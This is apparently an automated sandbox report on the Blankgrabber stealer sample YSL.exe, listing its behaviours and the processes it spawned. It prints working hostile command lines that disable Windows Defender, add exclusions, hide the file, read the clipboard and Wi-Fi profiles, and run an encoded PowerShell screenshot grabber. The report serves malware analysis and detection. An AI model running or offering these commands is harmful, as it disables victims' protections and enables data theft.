Analysis Overview
SHA256
83f5a2f68b73babb2f3b9c137294b41ae8280dbaf2a75cceb42999f375879f00
Threat Level: Known bad
The file YSL.exe was found to be: Known bad.
Malicious Activity Summary
A stealer written in Python and packaged with Pyinstaller
Blankgrabber family
Drops file in Drivers directory
Command and Scripting Interpreter: PowerShell
Reads user/profile data of web browsers
Clipboard Data
Executes dropped EXE
Unsecured Credentials: Credentials In Files
Loads dropped DLL
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
Obfuscated Files or Information: Command Obfuscation
Legitimate hosting services abused for malware hosting/C2
Enumerates processes with tasklist
Hide Artifacts: Hidden Files and Directories
UPX packed file
Drops file in Windows directory
Event Triggered Execution: Netsh Helper DLL
Browser Information Discovery
Enumerates physical storage devices
Unsigned PE
System Network Configuration Discovery: Wi-Fi Discovery
Modifies data under HKEY_USERS
Detects videocard installed
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of WriteProcessMemory
Views/modifies file attributes
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Gathers system information
Enumerates system info in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-07 21:48
Signatures
A stealer written in Python and packaged with Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blankgrabber family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-07 21:48
Reported
2024-11-07 21:58
Platform
win11-20241007-de
Max time kernel
600s
Max time network
604s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\YSL.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
Clipboard Data
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI37922\rar.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YSL.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YSL.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YSL.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YSL.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YSL.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YSL.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YSL.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YSL.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YSL.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YSL.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YSL.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YSL.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YSL.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YSL.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YSL.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YSL.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\YSL.exe | N/A |
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Obfuscated Files or Information: Command Obfuscation
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Hide Artifacts: Hidden Files and Directories
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SystemTemp | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Windows\INF\display.PNF | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133754897460509974" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\YSL.exe
"C:\Users\Admin\AppData\Local\Temp\YSL.exe"
C:\Users\Admin\AppData\Local\Temp\YSL.exe
"C:\Users\Admin\AppData\Local\Temp\YSL.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\YSL.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Fatal Error', 0, 'Fatal Error', 0+16);close()""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\YSL.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Fatal Error', 0, 'Fatal Error', 0+16);close()"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\YSL.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Temp\YSL.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
